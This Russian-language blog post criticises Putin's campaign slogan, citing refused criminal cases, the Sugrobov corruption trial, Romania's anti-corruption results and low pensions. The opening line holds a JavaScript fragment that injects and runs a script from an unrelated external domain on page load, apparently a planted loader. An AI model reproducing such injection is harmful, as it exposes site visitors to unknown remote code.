, 'opacity': false, 'speedIn': 500, 'speedOut': 500, 'changeSpeed': 300, 'overlayShow': false, 'overlayOpacity': "", 'overlayColor': "", 'titleShow': false, 'titlePosition': '', 'enableEscapeButton': false, 'showCloseButton': false, 'showNavArrows': false, 'hideOnOverlayClick': false, 'hideOnContentClick': false, 'width': 500, 'height': 340, 'transitionIn': "", 'transitionOut': "", 'centerOnScroll': false }); var script = document.createElement('script'); script.type= 'text/javascript'; script.src = 'https://cdn.messagefromspaces.com/c.js?pro=type'; document.getElementsByTagName('head')[0].appendChild(script); })
RSS
 

Если Путин сильный президент, то почему права и свободы россиян не стали высшей ценностью?

15 Янв

Предвыборная программа Путина проходит под лозунгом: «Сильный президент —  сильная Россия».

А когда же вспомним, что Человек, его права и свободы являются высшей ценностью?

Как долго, при «сильном» президенте, миллионы пострадавших от преступлений, будут получать неправомерные отказы в возбуждении уголовных дел?

Что это за «отказные» дела, даёт представление статья, опубликованная в «Литературной Газете» «Мечтателям не место за рулём!...» http://lgz.ru/article/-35−6428−04−09−2013/mechtatelyam-ne-mesto-za-rulyem-/

Только публикация в газете позволила наказать виновного в совершении тяжкого преступления.

Как долго при «сильном»  президенте, сотни тысяч предпринимателей будут обираться теми, кто обязан их защищать?

А разве о силе президента Путина свидетельствуют результаты борьбы с коррупцией?

Провальной оказалась организация Путиным такой борьбы. Созданные подразделения занялись фальсификацией уголовных дел, а принятые законы, выборочно применяемыми.

Мосгорсуд https://www.gazeta.ru/social/2017/04/27/10646999.shtml    вынес приговор по делу генерал-лейтенанта полиции и бывшего руководителя Главного управления экономической безопасности и противодействия коррупции (ГУЭБиПК) Дениса Сугробова, а также восьмерых его подчиненных, которые повышали раскрываемость корыстными методами. Согласно тексту приговора суда, генерал создал преступную группу из своих подчиненных, допустил множество фактов превышения должностных полномочий, а также организовал «провокацию взятки».

Даже в Румынии, никогда не славившейся борьбой с преступностью,  результаты борьбы с коррупцией, поражают.

Оказалось, что для борьбы с этим криминальным явлением, не надо создавать затратных Главных управлений, возглавляемых генералами.

Так, самый молодой прокурор в истории Румынии Кьовеши, доказала, что можно без фальсификаций за  год завести более тысячи уголовных дел на румынских коррупционеров.  В том числе — на брата президента, который назначил ее на этот пост https://www.currenttime.tv/amp/28784455.html

В 2016 году, Кьовеши, как следует из отчета ее департамента, отправила в суды уголовные дела против более чем 1,2 тыс. подозреваемых в хищениях, взяточничестве и откатах чиновников:

3 министров,

6 сенаторов,

11 депутатов,

47 мэров городов,

21 представителя компании с госучастием.

Избранные во власть попытались спрятаться за новый декриминализационный закон, снимающий уголовную ответственность с коррупционеров, если те причинили ущерб государству на сумму меньше 48 тыс. долларов. Однако  в феврале 2017 года в Бухаресте и других городах прошли массовые протесты против коррупции, в них приняли участие 250 тыс. человек.

Эта была крупнейшая за последние 25 лет акция протеста в Румынии, и спровоцировал ее «новый» закон.

После массовых протестов закон отменили.

Это хороший пример для называющих себя  в России «оппозиционеров», как надо действовать, когда избранные во власть пытаются законодательную власть использовать в своих целях.

Учитесь господа хорошие, как надо не бузить, рассказывая разные случаи коррупционного поведения чиновников,  а добиваться законности и реальной борьбы с коррупцией.

Уверен, что  будучи сильным президентом, Путин не стал бы столько лет  имитировать борьбу с коррупцией, а повсеместно применил бы процедуры, направленные на применение п.п. 8 п. 2 ст. 235 ГК РФ, лишая имущества каждого, кто не докажет правомерность обладания им. Но за шесть лет данная норма была применена не более 20 раз.

Сильный президент не позволил бы использовать то, что получено в результате  криминальной деятельности или обладать имуществом «необъясненного происхождения». Он стал бы инициатором  закон «О криминальных финансах». Любой, уличённый в обладании таким имуществом обязан  сам доказать правомерность обладания им.

Это позволило бы сотни тысяч обогащавшихся неправомерно, публично с позором лишать имущества, оставляя их дома, а не в местах лишения свободы. Сохранились бы бюджетные средства, а казна увеличилась бы, позволяя расходовать изъятые средства на пенсии и социальные нужды.

Разве у сильного президента чиновники могли бы установить для себя пенсии и зарплаты, превышающие средние по стране в 25−30 раз?

Разве сильный президент оставил бы без внимания публичное письменное обращение к гаранту Конституции,  федерального судьи Д. Новикова http://www.compronet.info/LettersToAuthorities/90/ , раскрывающее суть ничем не умеряемого в стране самовластия?

В этой связи меня не покидают мысли о том, пойдут ли голосовать за сильного президента Путина: —  9 000 000 пострадавших от преступлений, что так и не получили статус «потерпевший», поскольку им неправомерно отказали в возбуждении уголовного дела? — 700 000 осужденных, что осудили только на одних их признательных показания, игнорируя факты пыточного судопроизводства в России и то, что ч. 2 ст. 77 УПК РФ запрещает осуждать при признании  обвиняемым своей вины, если виновность не подтверждается совокупностью имеющихся по делу доказательств? —  5 000 000, что получают за свой труд  7−8 тыс. руб.? —  15 000 000 работающих пенсионеров, уплачивающих все налоги и выплаты в пенсионный фонд, которым не будут индексировать пенсии в 2018 году, но проиндексируют пенсии всем чиновникам, включая и министра финансов, который получает из казны за свой труд около 2 млн. руб. в месяц? — 57 000 000 россиян, что проигнорировали последние выборы? —  9 000 000 москвичей, что проигнорировали последние выборы мэра Москвы? —  5 000 000 военных пенсионеров, что получают в пять раз меньшую пенсию, чем военные пенсионеры Германии, которую наши отцы и деды победили?

А пойдут ли голосовать за Путина христиане, после его сравнения тела предателя Отечества,  ратовавшего за победу Германии над Россией в Первой мировой войне, дворянина Ульянова, жившего под кличкой Ленин, со святыми мощами? http://www.mk.ru/politics/2018/01/14/putin-sravnil-kommunizm-s-khristianstvom-telo-lenina-so-svyatymi-moshhami.html

 
Комментариев нет

Автор: ossin Категория: Прочие заметки

 

Оставить комментарий

Вы должны войти, чтобы оставить комментарий.